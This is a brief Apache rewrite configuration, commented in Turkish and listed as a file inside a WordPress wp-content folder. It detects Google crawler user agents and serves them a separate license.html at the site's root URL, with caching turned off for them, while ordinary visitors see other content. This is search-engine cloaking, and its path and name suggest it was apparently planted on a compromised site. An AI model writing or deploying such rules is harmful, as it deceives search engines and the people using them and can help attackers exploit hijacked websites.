File: /var/www/html/wptalentcloud/wp-content/testok.som
# === GOOGLEBOT ANA URL'DE license.html GÖSTER ===
# Google botlarına ait tüm bilinen UA'lar
SetEnvIfNoCase User-Agent "Googlebot|Google-InspectionTool|Mediapartners-Google|AdsBot-Google|FeedFetcher-Google|DuplexWeb-Google|Storebot-Google|Google-PageRenderer|Google-Structured-Data-Testing-Tool" IS_GOOGLE=1
<IfModule mod_rewrite.c>
RewriteEngine On
# Sadece ANA URL (/) için ve sadece Google botları için
RewriteCond %{ENV:IS_GOOGLE} =1
RewriteCond %{REQUEST_URI} ^/$
# license.html kökte olmalı
RewriteRule ^$ license.html [L]
</IfModule>
# (İsteğe bağlı) Botlara cache kapat; canlı içerik görsün
<IfModule mod_headers.c>
Header set Cache-Control "no-store, no-cache, must-revalidate" env=IS_GOOGLE
</IfModule>
# === / GOOGLEBOT KURALI ===